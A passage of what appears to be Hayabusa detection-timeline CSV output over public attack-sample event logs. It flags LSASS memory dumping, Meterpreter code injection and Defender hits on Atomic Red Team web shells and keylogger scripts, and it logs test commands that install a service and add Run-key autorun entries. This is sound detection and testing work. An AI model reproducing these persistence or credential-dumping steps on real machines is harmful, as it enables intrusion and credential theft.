+09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: AndrewSpecial.exe : Path: C:\Users\administrator\Desktop\AndrewSpecial.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl : Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T : Severity: Severe : Type: Backdoor : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx : Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); 
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" 
/c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe start AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start 
AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe stop AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe delete AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 
+09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN 
